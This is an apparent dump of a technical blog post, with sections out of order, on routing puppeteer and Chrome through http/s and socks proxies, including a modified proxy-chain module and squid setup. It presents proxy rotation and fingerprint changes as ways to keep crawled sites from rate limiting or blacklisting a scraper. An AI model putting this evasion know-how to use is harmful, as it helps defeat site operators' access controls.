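    password: decodeURIComponent(url.password),
    host: url.hostname,
    port: Number(url.port),
  };
}

console.log(parseProxyString(proxyString));
```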
<h2>Overview</h2>
<p>The table below summarizes the current state of proxy support in the chrome browser when controlled by puppeteer. The contribution of this blog article is to make it possible to change http/s proxies dynamically via a <a href="https://github.com/NikolaiT/proxy-chain/commit/1963f76774c958ec3c63354dda60c965c9f65501#diff-6ea992016c2394768b145c7f24a5b2d9">modified proxy-chain module</a>.</p>
<table>
<thead>
<tr>
<th>Proxy Scheme</th>
<th>Chrome Browser support</th>
<th>Authentication</th>
<th>Dynamic Proxy Change</th>
</tr>
</thead>
<tbody>
<tr>
<td>http/s</td>
<td>yes</td>
<td>with pptr <code>page.authenticate()</code>, not via command line</td>
<td>with <a href="https://github.com/NikolaiT/proxy-chain/commit/1963f76774c958ec3c63354dda60c965c9f65501#diff-6ea992016c2394768b145c7f24a5b2d9">modified proxy-chain</a></td>
</tr>
<tr>
<td>socks4</td>
<td>yes</td>
<td>not a part of socks4</td>
<td>no, <code>proxy-chain</code> only supports http/s proxies</td>
</tr>
<tr>
<td>socks5</td>
<td>yes, but only without authentication</td>
<td>username/password authentication is not supported by the chrome browser</td>
<td>no</td>
</tr>
</tbody>
</table>
<h2>Dynamically changing proxy configuration from puppeteer code</h2>
<p>It is possible to change the upstream proxy server in <code>proxy-chain</code> dynamically by setting an extra http header such as <strong>x-no-forward-upstream-proxy</strong>. However, this header would also be copied and sent on to the upstream proxy. This is not what we want, since it would leak the username and password contained in the proxy string to the website we want to crawl. That would be a horrendous idea.</p>
<p>Therefore, we need the intermediate proxy server to have the capability to strip all headers that start with a magic string such as <strong>x-no-forward</strong>.</p>
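<p>The stripping step itself is simple. The sketch below is not the code from the modified <code>proxy-chain</code> module. It only illustrates the idea on a plain headers object, and the function name <code>stripPrivateHeaders</code> is an assumption made for this example:</p>

```javascript
// Headers whose names start with this prefix must never leave the intermediate proxy.
const MAGIC_PREFIX = 'x-no-forward';

// Illustrative helper: returns a copy of the headers without the private ones.
// Header names are compared case-insensitively, since http header names are case-insensitive.
function stripPrivateHeaders(headers, prefix = MAGIC_PREFIX) {
  const forwarded = {};
  for (const [name, value] of Object.entries(headers)) {
    if (!name.toLowerCase().startsWith(prefix)) {
      forwarded[name] = value;
    }
  }
  return forwarded;
}

const incoming = {
  'user-agent': 'Mozilla/5.0',
  'x-no-forward-upstream-proxy': 'http://proxyuser:proxypassword@100.100.100.100:3128',
  accept: '*/*',
};

// Only 'user-agent' and 'accept' remain.
console.log(stripPrivateHeaders(incoming));
```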
<p>This is our puppeteer client:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">proxyUrl</span> <span class="o">=</span> <span class="s1">'http://localhost:8000'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=</span><span class="si">${</span><span class="nx">proxyUrl</span><span class="si">}</span><span class="sb">`</span><span class="p">],</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="c1">// signal to the intermediate proxy server what upstream proxy we want to use</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setExtraHTTPHeaders</span><span class="p">({</span>
<span class="s1">'x-no-forward-upstream-proxy'</span><span class="o">:</span> <span class="s1">'http://proxyuser:proxypassword@100.100.100.100:3128'</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'http://ipinfo.io/json'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
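<p>Since some sites need a different proxy for each url, the header value can be rotated between page loads. The following is a rough sketch under the assumption that a fixed pool of upstream proxies is available. The second address in the pool and the helper names are hypothetical:</p>

```javascript
// Hypothetical pool of upstream proxies; replace with real proxy strings.
const PROXY_POOL = [
  'http://proxyuser:proxypassword@100.100.100.100:3128',
  'http://proxyuser:proxypassword@100.100.100.101:3128',
];

// Header name taken from the puppeteer client above.
const UPSTREAM_HEADER = 'x-no-forward-upstream-proxy';

// Returns a function that hands out the proxies of the pool in round-robin order.
function createProxyRotator(pool) {
  if (pool.length === 0) {
    throw new Error('proxy pool must not be empty');
  }
  let next = 0;
  return () => {
    const proxy = pool[next];
    next = (next + 1) % pool.length;
    return proxy;
  };
}

// Builds the extra headers for a single page load.
function headersForNextRequest(nextProxy) {
  return { [UPSTREAM_HEADER]: nextProxy() };
}

const nextProxy = createProxyRotator(PROXY_POOL);
console.log(headersForNextRequest(nextProxy));
console.log(headersForNextRequest(nextProxy));
```

<p>In the client above, the result of <code>headersForNextRequest(nextProxy)</code> would be passed to <code>page.setExtraHTTPHeaders()</code> before each call to <code>page.goto()</code>.</p>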
<p>And this is our intermediate proxy server:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// proxy_server.js</span>
<span class="kd">const</span> <span class="nx">ProxyChain</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'proxy-chain'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">server</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">ProxyChain</span><span class="p">.</span><span class="nx">Server</span><span class="p">({</span>
<span class="c1">// Port where the server will listen. By default 8000.</span>
<span class="nx">port</span><span class="o">:</span> <span class="mf">8000</span><span class="p">,</span>
<span class="c1">// Enables verbose logging</span>
<span class="nx">verbose</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="nx">prepareRequestFunction</span><span class="o">:</span> <span class="p">({</span> <span class="nx">request</span><span class="p">,</span> <span class="nx">username</span><span class="p">,</span> <span class="nx">password</span><span class="p">,</span> <span class="nx">hostname</span><span class="p">,</span> <span class="nx">port</span><span class="p">,</span> <span class="nx">isHttp</span><span class="p">,</span> <span class="nx">connectionId</span> <span class="p">})</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">upstream_proxy</span> <span class="o">=</span> <span class="nx">request</span><span class="p">.</span><span class="nx">headers</span><span class="p">[</span><span class="s1">'x-no-forward-upstream-proxy'</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">upstream_proxy</span><span class="p">)</span> <span class="p">{</span>
<span class="k">throw</span> <span class="ne">Error</span><span class="p">(</span><span class="s1">'please set header `x-no-forward-upstream-proxy`'</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">{</span>
<span class="nx">upstreamProxyUrl</span><span class="o">:</span> <span class="nx">upstream_proxy</span><span class="p">,</span>
<span class="p">};</span>
<span class="p">},</span>
<span class="p">});</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">listen</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Proxy server is listening on port </span><span class="si">${</span><span class="nx">server</span><span class="p">.</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">});</span>
<span class="c1">// Emitted when HTTP connection is closed</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="s1">'connectionClosed'</span><span class="p">,</span> <span class="p">({</span> <span class="nx">connectionId</span><span class="p">,</span> <span class="nx">stats</span> <span class="p">})</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Connection </span><span class="si">${</span><span class="nx">connectionId</span><span class="si">}</span><span class="sb"> closed`</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">dir</span><span class="p">(</span><span class="nx">stats</span><span class="p">);</span>
<span class="p">});</span>
<span class="c1">// Emitted when HTTP request fails</span>
<span class="nx">server</span><span class="p">.</span><span class="nx">on</span><span class="p">(</span><span class="s1">'requestFailed'</span><span class="p">,</span> <span class="p">({</span> <span class="nx">request</span><span class="p">,</span> <span class="nx">error</span> <span class="p">})</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Request </span><span class="si">${</span><span class="nx">request</span><span class="p">.</span><span class="nx">url</span><span class="si">}</span><span class="sb"> failed`</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="nx">error</span><span class="p">);</span>
<span class="p">});</span>
</code></pre></div>
<p>In order to set the upstream proxy via the HTTP header <strong>x-no-forward-upstream-proxy</strong>, a <a href="https://github.com/NikolaiT/proxy-chain/commit/1963f76774c958ec3c63354dda60c965c9f65501#diff-6ea992016c2394768b145c7f24a5b2d9">code modification is required</a> in the source code of the <code>proxy-chain</code> module. </p>
<p>With this small modification, we can switch the proxy server as often as we wish. </p>
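<p>Because the upstream proxy is now taken from a request header, it may be worth validating the value before handing it to <code>proxy-chain</code>. The following is only a minimal sketch: <code>parseUpstreamProxy</code> is a hypothetical helper (it is not part of <code>proxy-chain</code>), and the restriction to <code>http:</code> upstream proxies is an assumption made for this example.</p>

```javascript
// Hypothetical helper, not part of proxy-chain: validates the value of the
// `x-no-forward-upstream-proxy` header before it is used as upstream proxy.
function parseUpstreamProxy(headerValue) {
  if (!headerValue) {
    throw new Error('please set header `x-no-forward-upstream-proxy`');
  }
  let url;
  try {
    // The WHATWG URL parser throws a TypeError on malformed input.
    url = new URL(headerValue);
  } catch (err) {
    throw new Error(`invalid upstream proxy url: ${headerValue}`);
  }
  // Assumption for this sketch: only plain http upstream proxies are accepted.
  if (url.protocol !== 'http:') {
    throw new Error(`unsupported upstream proxy protocol: ${url.protocol}`);
  }
  if (!url.hostname) {
    throw new Error('upstream proxy url must contain a hostname');
  }
  // Return the original string so that the proxy receives exactly what was sent.
  return headerValue;
}

// Possible usage inside prepareRequestFunction of proxy_server.js:
//   return {
//     upstreamProxyUrl: parseUpstreamProxy(request.headers['x-no-forward-upstream-proxy']),
//   };
```

<p>Failing early with a descriptive error makes a misconfigured client easier to spot than a connection that silently never gets established.</p>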
<p>First install the modified module directly from github with the command:</p>
<div class="highlight"><pre><span></span><code>npm install NikolaiT/proxy-chain
</code></pre></div>
<p>which installs the <code>proxy-chain</code> fork. Then the server code listed above is launched with the command <code>node proxy_server.js</code>.</p>
<p>An example usage could be the following client program. It can be executed with <code>node proxy_client.js</code> after the server was started.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// proxy_client.js</span>
<span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=http://localhost:8000`</span><span class="p">],</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="c1">// signal to the intermediate proxy server what upstream proxy we want to use</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setExtraHTTPHeaders</span><span class="p">({</span>
<span class="s1">'x-no-forward-upstream-proxy'</span><span class="o">:</span> <span class="s1">'http://proxyuser:proxypass@100.100.100.100:3128'</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'http://ipinfo.io/json'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="c1">// SWITCH THE PROXY SERVER</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setExtraHTTPHeaders</span><span class="p">({</span>
<span class="s1">'x-no-forward-upstream-proxy'</span><span class="o">:</span> <span class="s1">'http://proxyuser:proxypass@200.200.200.200:3128'</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'http://ipinfo.io/json'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
<p>It should output the IP address metadata of two different proxy connections. If that is the case, the experiment <strong>was a success</strong>.</p>
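<p>The success check can also be automated instead of comparing the output by eye. The sketch below assumes that the page content contains the JSON answer of ipinfo.io with an <code>"ip"</code> field; <code>extractIp</code> and <code>proxySwitchSucceeded</code> are hypothetical helper names introduced for this example.</p>

```javascript
// Pulls the value of the "ip" field out of the string returned by page.content().
// Assumption: the JSON of ipinfo.io is embedded verbatim in the page markup.
function extractIp(pageContent) {
  const match = /"ip"\s*:\s*"([^"]+)"/.exec(pageContent);
  return match ? match[1] : null;
}

// The proxy switch worked if both requests reported an IP address
// and the two addresses differ.
function proxySwitchSucceeded(firstContent, secondContent) {
  const first = extractIp(firstContent);
  const second = extractIp(secondContent);
  return first !== null && second !== null && first !== second;
}

// Possible usage in proxy_client.js:
//   const first = await page.content();   // after the first page.goto()
//   const second = await page.content();  // after switching the proxy
//   console.log(proxySwitchSucceeded(first, second) ? 'success' : 'failure');
```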
<h2>Solving the problem of missing proxy authentication in chrome</h2>
<p>For completeness' sake, here is how to authenticate to a proxy with puppeteer. <code>proxy-chain</code> is <strong>not needed anymore</strong> to solve the chrome/puppeteer authentication problem. We can simply use <code>page.authenticate()</code> to accomplish that.</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">proxyUrl</span> <span class="o">=</span> <span class="s1">'http://100.100.100.100:3128'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=</span><span class="si">${</span><span class="nx">proxyUrl</span><span class="si">}</span><span class="sb">`</span><span class="p">],</span>
<span class="p">});</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">authenticate</span><span class="p">({</span>
<span class="nx">username</span><span class="o">:</span> <span class="s1">'proxyuser'</span><span class="p">,</span>
<span class="nx">password</span><span class="o">:</span> <span class="s1">'proxypassword'</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://ipinfo.io/json'</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">content</span><span class="p">());</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">})();</span>
</code></pre></div>
<h2>What about socks4/socks5 proxies?</h2>
<p>Browser version:</p>
<div class="highlight"><pre><span></span><code>$ chromium-browser --version
Using PPAPI flash.
Chromium <span class="m">78</span>.0.3904.108 Built on Ubuntu , running on Ubuntu <span class="m">18</span>.04
</code></pre></div>
<p>Unfortunately, the chrome browser only supports socks proxies without authentication out of the box. Passing a proxy string with credentials such as
<code>socks5://proxyuser:proxypass@100.100.100.100:53425</code> to chrome will not work. The following command will not create a connection</p>
<div class="highlight"><pre><span></span><code>chromium-browser --proxy-server<span class="o">=</span><span class="s1">'socks5://proxyuser:proxypass@100.100.100.100:53425'</span> https://ipinfo.io/json
</code></pre></div>
<p>and fail with <strong>ERR_NO_SUPPORTED_PROXIES</strong>. However, the curl command</p>
<div class="highlight"><pre><span></span><code>curl --proxy socks5://proxyuser:proxypass@100.100.100.100:53425 http://ipinfo.io/json
</code></pre></div>
<p>works flawlessly.</p>
<p>When we use socks4 with the chrome browser, it works as expected:</p>
<div class="highlight"><pre><span></span><code>chromium-browser --proxy-server<span class="o">=</span><span class="s1">'socks://100.100.100.100:53425'</span> https://ipinfo.io/json
</code></pre></div>
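<p>To avoid running into <strong>ERR_NO_SUPPORTED_PROXIES</strong> at runtime, the proxy string can be checked before chrome is launched. The following is a minimal sketch under the assumption that credentials are never allowed for socks proxies and have to be passed separately (via <code>page.authenticate()</code>) for http proxies; <code>toChromeProxyArg</code> is a hypothetical helper name.</p>

```javascript
// Hypothetical helper: turns a proxy URL into the --proxy-server flag for chrome.
// Credentials are split off, because they must not be part of the flag.
function toChromeProxyArg(proxyUrl) {
  const url = new URL(proxyUrl);
  const hasCredentials = Boolean(url.username || url.password);
  if (url.protocol.startsWith('socks') && hasCredentials) {
    // chrome cannot authenticate against socks proxies, so fail early.
    throw new Error('socks proxies with username:password are not supported by chrome');
  }
  return {
    arg: `--proxy-server=${url.protocol}//${url.host}`,
    // For http proxies, the credentials can be handed to page.authenticate().
    credentials: hasCredentials
      ? {
          username: decodeURIComponent(url.username),
          password: decodeURIComponent(url.password),
        }
      : null,
  };
}

// Possible usage:
//   const { arg, credentials } = toChromeProxyArg('http://proxyuser:proxypass@100.100.100.100:3128');
//   const browser = await puppeteer.launch({ args: [arg] });
//   const page = await browser.newPage();
//   if (credentials) await page.authenticate(credentials);
```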
<h2>Limitations of http/s proxies</h2>
<p>There are a couple of security issues with http/s proxy servers. It is also possible to detect that a browser reroutes its traffic through a proxy. For example, the module <code>apifytech/proxy-chain</code> deletes the following headers:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">HOP_BY_HOP_HEADERS</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'Connection'</span><span class="p">,</span>
<span class="s1">'Keep-Alive'</span><span class="p">,</span>
<span class="s1">'Proxy-Authenticate'</span><span class="p">,</span>
<span class="s1">'Proxy-Authorization'</span><span class="p">,</span>
<span class="s1">'TE'</span><span class="p">,</span>
<span class="s1">'Trailers'</span><span class="p">,</span>
<span class="s1">'Transfer-Encoding'</span><span class="p">,</span>
<span class="s1">'Upgrade'</span><span class="p">,</span>
<span class="p">];</span>
</code></pre></div>
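<p>To make concrete what deleting these headers means for a request, here is a minimal sketch. It is <strong>not</strong> the actual implementation of <code>proxy-chain</code>; <code>stripHopByHopHeaders</code> is a hypothetical function that only illustrates the effect on the headers of a websocket handshake.</p>

```javascript
const HOP_BY_HOP_HEADERS = [
  'Connection',
  'Keep-Alive',
  'Proxy-Authenticate',
  'Proxy-Authorization',
  'TE',
  'Trailers',
  'Transfer-Encoding',
  'Upgrade',
];

// Returns a copy of the headers without the hop-by-hop headers.
// Header names are compared case-insensitively.
function stripHopByHopHeaders(headers) {
  const blocked = new Set(HOP_BY_HOP_HEADERS.map((name) => name.toLowerCase()));
  const result = {};
  for (const [name, value] of Object.entries(headers)) {
    if (!blocked.has(name.toLowerCase())) {
      result[name] = value;
    }
  }
  return result;
}

// Headers of a typical websocket handshake (the key is the sample value from RFC 6455).
const handshake = {
  Host: 'example.org',
  Upgrade: 'websocket',
  Connection: 'Upgrade',
  'Sec-WebSocket-Key': 'dGhlIHNhbXBsZSBub25jZQ==',
  'Sec-WebSocket-Version': '13',
};

// After stripping, neither Upgrade nor Connection is left in the request.
console.log(stripHopByHopHeaders(handshake));
```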
<p>Since the <code>Upgrade</code> and <code>Connection</code> headers are used in the establishment of websocket connections, the chrome browser won't be able to use websites that require websockets. This can easily be confirmed by testing with this script:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'puppeteer'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">proxyChain</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'proxy-chain'</span><span class="p">);</span>
<span class="p">(</span><span class="k">async</span><span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">oldProxyUrl</span> <span class="o">=</span> <span class="s1">'http://proxyuser:proxypassword@100.100.100.100:3128'</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">newProxyUrl</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">proxyChain</span><span class="p">.</span><span class="nx">anonymizeProxy</span><span class="p">(</span><span class="nx">oldProxyUrl</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">browser</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span>
<span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="nx">args</span><span class="o">:</span> <span class="p">[</span><span class="sb">`--proxy-server=</span><span class="si">${</span><span class="nx">newProxyUrl</span><span class="si">}</span><span class="sb">`</span><span class="p">],</span>
<span class="p">});</span>
<span class="c1">// Do your magic here...</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="s1">'https://www.websocket.org/echo.html'</span><span class="p">);</span>
<span class="c1">// oh wait a minute</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitFor</span><span class="p">(</span><span class="mf">60000</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="c1">// Clean up</span>
<span class="k">await</span> <span class="nx">proxyChain</span><span class="p">.</span><span class="nx">closeAnonymizedProxy</span><span class="p">(</span><span class="nx">newProxyUrl</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="p">})();</span>
</code></pre></div>Using http/s and socks4/5 proxies with puppeteer and chrome with squid and danted2020-02-12T21:42:00+01:002020-02-13T13:32:00+01:00Nikolai Tschachertag:incolumitas.com,2020-02-12:/2020/02/12/https-and-socks-proxies-with-puppeteer-and-squid-and-danted/<p>This blog post demonstrates how puppeteer and the chrome browser can be used with http/s and socks4/5 proxies. For that purpose, a proxy server is set up on Ubuntu 18.04 with <strong>squid3</strong> and <strong>dante</strong>.</p><h2>For what reason are proxies used when crawling/scraping with puppeteer?</h2>
<p>When we are crawling different websites, it's usually a good idea to change the browsing fingerprint by re-routing the TCP traffic through multiple distinct hops.</p>
<p>By doing so, the crawled website cannot rate limit or blacklist the client based on a single IP address. Put differently, by switching proxy servers, the detection rate can be reduced by a wide margin.</p>
<p>But changing your IP address is <strong>usually not enough</strong>. It's also smart to alter your browser fingerprint in other ways, such as changing the user agent, cleaning session data such as cookies and cached objects, modifying accept-language headers or changing the browser viewport.</p>
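<p>As a rough illustration of these additional measures, the sketch below applies a user agent, an accept-language header and a viewport to a puppeteer page. The entries in <code>PROFILES</code> are placeholder values chosen for this example and <code>applyProfile</code> is a hypothetical helper; only the puppeteer methods <code>page.setUserAgent()</code>, <code>page.setExtraHTTPHeaders()</code> and <code>page.setViewport()</code> are real API calls.</p>

```javascript
// Placeholder profiles for illustration only; use values that fit your setup.
const PROFILES = [
  {
    userAgent: 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
    acceptLanguage: 'en-US,en;q=0.9',
    viewport: { width: 1366, height: 768 },
  },
  {
    userAgent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
    acceptLanguage: 'de-DE,de;q=0.9,en;q=0.8',
    viewport: { width: 1920, height: 1080 },
  },
];

// Applies one profile to a puppeteer page before any navigation happens.
async function applyProfile(page, profile) {
  await page.setUserAgent(profile.userAgent);
  await page.setExtraHTTPHeaders({ 'Accept-Language': profile.acceptLanguage });
  await page.setViewport(profile.viewport);
}

// Possible usage:
//   const page = await browser.newPage();
//   await applyProfile(page, PROFILES[Math.floor(Math.random() * PROFILES.length)]);
//   await page.goto('https://ipinfo.io/json');
```

<p>Session data such as cookies and cached objects is not touched by this sketch. Launching a fresh browser for each crawl is one simple way to start with a clean session.</p>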
<p>Scraping and crawling in the year 2020 is usually done with a fully functional browser in order to prevent blocking attempts that build on the requirement to be able to execute javascript. Puppeteer in combination with headless chromium is often used for that matter.</p>
<p>In this blog post, we will learn how Puppeteer/Chromium can be used with </p>
<ol>
<li><strong>Http/Https</strong> proxy support with and without <code>username:password</code> authentication. The proxy server is built with <a href="http://www.squid-cache.org/"><strong>squid3</strong></a>.</li>
<li><strong>Socks</strong> proxy support with and without <code>username:password</code> authentication. The proxy server is set up with <a href="https://www.inet.no/dante/"><strong>dante</strong></a>.</li>
</ol>
<p>For this reason, we will also show how to create your own http/s proxy server and socks proxy server on Ubuntu 18.04.</p>
<h2>Proxy Server Setup</h2>
<p>All proxy server software is going to be installed on an Ubuntu 18.04 server. The only requirement is that the server should have a static, public IP address.</p>
<ol>
<li><strong>Client IP address</strong> (the computer that uses the proxy) = <strong>1.1.1.1</strong></li>
<li><strong>Proxy Server IP address</strong> (the server that <em>is</em> the proxy) = <strong>100.100.100.100</strong></li>
</ol>
<h3>Creating a http/s proxy server with squid3 on Ubuntu 18.04</h3>
<p>Squid is a powerful and mature http/s proxy server and caching software. For our purposes, we are solely interested in the proxying functionality. The configuration is based on a <a href="https://stackoverflow.com/questions/48239975/how-do-i-setup-an-elite-http-squid-proxy-with-password-protection-on-ubuntu">stackoverflow answer</a> that explains in depth how to set up squid to work as an anonymous http/s proxy.</p>
<p>First of all, we need to install the required software packages for <code>squid3</code> to work:</p>
<div class="highlight"><pre><span></span><code>sudo apt-get update
sudo apt-get install squid3
sudo apt-get install apache2-utils
</code></pre></div>
<p>Then we create the password file that <code>squid3</code> is going to use for authentication. This command requires you to enter a password of your choice. We will use the credentials <code>proxyuser:proxypass</code>.</p>
<div class="highlight"><pre><span></span><code>sudo htpasswd -c /etc/squid/.squid_users proxyuser
</code></pre></div>
<p>You can verify that the password works by issuing the following command, typing <code>proxyuser proxypass</code> and pressing enter. You should see <code>OK</code> as output.</p>
<div class="highlight"><pre><span></span><code>/usr/lib/squid3/basic_ncsa_auth /etc/squid/.squid_users
</code></pre></div>
<p>Then we configure the configuration file <code>/etc/squid/squid.conf</code> as follows. Please replace the dummy IP address <strong>100.100.100.100</strong> with the ip address of your own server.</p>
<div class="highlight"><pre><span></span><code><span class="c1"># http_port: specifies the proxy listen port. This is required</span>
http_port <span class="m">3128</span>
<span class="c1"># dns_v4_first on: effectively turns off IPv6 DNS. Without this your proxy may run very slowly.</span>
dns_v4_first on
<span class="c1"># cache deny all: stops the proxy caching pages</span>
cache deny all
<span class="c1"># forwarded_for delete: remove the forwarded_for http header which would expose your source to the destination</span>
forwarded_for delete
<span class="c1"># tcp_outgoing_address: Set this to the address of your server. You can find the address with the command "ip a"</span>
tcp_outgoing_address <span class="m">100</span>.100.100.100
<span class="c1"># via off: removes more headers which would expose your source</span>
via off
<span class="c1"># auth_param: defines the location of basic_ncsa_auth and of the password file you created. Note that you may need to check the location of basic_ncsa_auth.</span>
auth_param basic program /usr/lib/squid3/basic_ncsa_auth /etc/squid/.squid_users
auth_param basic realm proxy
<span class="c1"># acl authenticated: creates an access control list for user authenticated by the password store</span>
acl authenticated proxy_auth REQUIRED
<span class="c1"># http_access allow authenticated: allow user to access the proxy if they have been authenticated by password</span>
http_access allow authenticated
<span class="c1"># http_access deny all: if you have not been authenticated by password, you're not coming in</span>
http_access deny all
</code></pre></div>
<p>Now we need to open the port on the standard firewall of Ubuntu with the command:</p>
<div class="highlight"><pre><span></span><code>ufw allow <span class="m">3128</span>
</code></pre></div>
<p>After having saved the file, restart the <code>squid3</code> service with <code>service squid restart</code>.</p>
<p>Test that everything works fine with curl:</p>
<div class="highlight"><pre><span></span><code>curl --proxy http://proxyuser:proxypass@100.100.100.100:3128 http://ipinfo.io/json
</code></pre></div>
<p>The above command should show you the IP details of the proxy server.</p>
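<p>The same check can be done from Node.js without any third party module. The sketch below only covers plain <code>http://</code> targets (https targets would require a <code>CONNECT</code> tunnel, which is not shown); <code>buildProxyRequestOptions</code> and <code>fetchThroughProxy</code> are hypothetical helper names introduced for this example.</p>

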